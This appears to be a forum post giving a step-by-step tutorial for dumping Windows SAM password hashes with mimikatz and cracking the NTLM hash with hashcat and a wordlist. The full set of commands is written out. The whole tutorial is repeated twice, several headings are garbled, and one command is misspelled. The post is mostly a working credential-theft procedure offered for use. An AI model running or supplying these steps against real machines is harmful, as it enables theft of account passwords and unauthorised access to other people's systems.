OP 05 September, 2021 - 03:11 AM
HOW TO RECEIVE AND CRACK WINDOWS PASSWORDS ?
? ?
⛏ ????????????
➤ Linux Machine (Host Machine)
➤ Windows Machine + Escalated Permissions
➤ CMD Access
➤ Password List
⚡️ ?????
First of all we need mimikatz. If you are using Kali Linux you can find mimikatz here:
/usr/share/windows-resources/mimikatz
xdg-open /usr/share/windows-resources/mimikatz
sudo zip `pwd`/mimikatz.zip -r -1 /usr/share/windows-resources/mimikatz
After we created our zip, upload it somewhere and download it on windows then drag it to desktop.
We also need for cracking the hashcat tool:
sudo apt install hashcat -y
1️⃣ Check Architecture
Open cmd and type :
wmic os get osarchitecture
If you have 32bit, go into the the win32 folder, if you have 64bit go into the x64 folder.
2️⃣ Run Mimikatz
Run the mimikatz.exe as Administrator.
For testing the privilege debug we type:
privilege::debug
The success response should be :
Privilege '20' OK
3️⃣ Impersonate Token & Dump SAM
To impersonate a token we use following command:
token::evelate
It will print a lot of text like this:
https://i.imgur.com/b4WS6tc.png
Let's dump the SAM:
lsadump::sam
The output looks like this :
https://i.imgur.com/ibYmfMA.png
4️⃣ Note And Crack The Hash
Scroll down. You will see after a bit scrolling the sorted "RID","User" and "Hash NTLM".
I scrolled down until i saw my username and then i copied the hash into a linux text file.
Screenshot:
https://i.imgur.com/9elUpcW.png
echo "0cb6948...07973b89537" > password.hash
Now it's time for cracking the hash with hashcat.
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt
-m = mode
1000 = NTLM
If you want, different modes you can either use the hashcat help command or take a look to their wiki:
hashcat --help
https://hashcat.net/wiki/
Finally if hashcat stops, you can view your cracked password either here :
https://i.imgur.com/KT9paTO.png
or by repeating the command with the --show parameter :
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt --show
? ?
⛏ ????????????
➤ Linux Machine (Host Machine)
➤ Windows Machine + Escalated Permissions
➤ CMD Access
➤ Password List
⚡️ ?????
First of all we need mimikatz. If you are using Kali Linux you can find mimikatz here:
/usr/share/windows-resources/mimikatz
xdg-open /usr/share/windows-resources/mimikatz
sudo zip `pwd`/mimikatz.zip -r -1 /usr/share/windows-resources/mimikatz
After we created our zip, upload it somewhere and download it on windows then drag it to desktop.
We also need for cracking the hashcat tool:
sudo apt install hashcat -y
1️⃣ Check Architecture
Open cmd and type :
wmic os get osarchitecture
If you have 32bit, go into the the win32 folder, if you have 64bit go into the x64 folder.
2️⃣ Run Mimikatz
Run the mimikatz.exe as Administrator.
For testing the privilege debug we type:
privilege::debug
The success response should be :
Privilege '20' OK
3️⃣ Impersonate Token & Dump SAM
To impersonate a token we use following command:
token::evelate
It will print a lot of text like this:
https://i.imgur.com/b4WS6tc.png
Let's dump the SAM:
lsadump::sam
The output looks like this :
https://i.imgur.com/ibYmfMA.png
4️⃣ Note And Crack The Hash
Scroll down. You will see after a bit scrolling the sorted "RID","User" and "Hash NTLM".
I scrolled down until i saw my username and then i copied the hash into a linux text file.
Screenshot:
https://i.imgur.com/9elUpcW.png
echo "0cb6948...07973b89537" > password.hash
Now it's time for cracking the hash with hashcat.
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt
-m = mode
1000 = NTLM
If you want, different modes you can either use the hashcat help command or take a look to their wiki:
hashcat --help
https://hashcat.net/wiki/
Finally if hashcat stops, you can view your cracked password either here :
https://i.imgur.com/KT9paTO.png
or by repeating the command with the --show parameter :
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt --show